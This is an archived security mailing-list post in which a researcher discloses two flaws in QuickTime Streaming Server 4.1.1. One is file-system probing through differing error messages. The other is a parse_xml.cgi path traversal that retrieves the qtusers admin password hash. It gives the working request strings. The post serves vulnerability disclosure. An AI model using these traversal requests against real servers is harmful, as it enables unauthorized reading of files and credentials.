lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <OF8AE653AF.3223FAA2-ON85256CDB.006A023B@hq.rapid7.com>
From: Joe_Testa at rapid7.com (Joe Testa)
Subject: Re:  QuickTime/Darwin Streaming Administration Server Multiple
 vulnerabilities

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



Word.

I've found two other issues in QuickTime Streaming Server v4.1.1 that
seem to be fixed in the newest v4.1.3:

1.)  File probing:

  Request:   http://localhost:1220/parse_xml.cgi?filename=../nonexistent
  Response:  'Can't access HTML file '../nonexistent'!' [...]

  Request:   http://localhost:1220/parse_xml.cgi?
                 filename=../../../autoexec.bat
  Response:  'Can't open HTML file '../../../autoexec.bat'! [...]

As you can see, this discrepency in the error message allows an
unauthenticated user to "feel-out" the file system and determine what
structures and files exist.

2.)  File retrieval:

  Request:   http://localhost:1220/parse_xml.cgi?filename=.../qtusers
  Response:  "realm Streaming Server admin:$dufr$D9/.....$C4g2VaRK" [...]

  This works against the Win32 platform, and not against the Linux
platform; this was not tested against Solaris or MacOS X.


Word.

   - Joe Testa, Rapid 7, Inc.
   http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
   A145 B158 2CA7 00A2 BAE8  4A18 57E5 18E0 02B0 0839

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v6.6.6 (X)

iD8DBQE+X7N/V+UY4AKwCDkRApNaAJkBIiCYmP705zL3wt2tIoR7j2XbowCfeSmf
OmiDhu+FpspKJpToTLZ5zRc=
=Yq4D
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ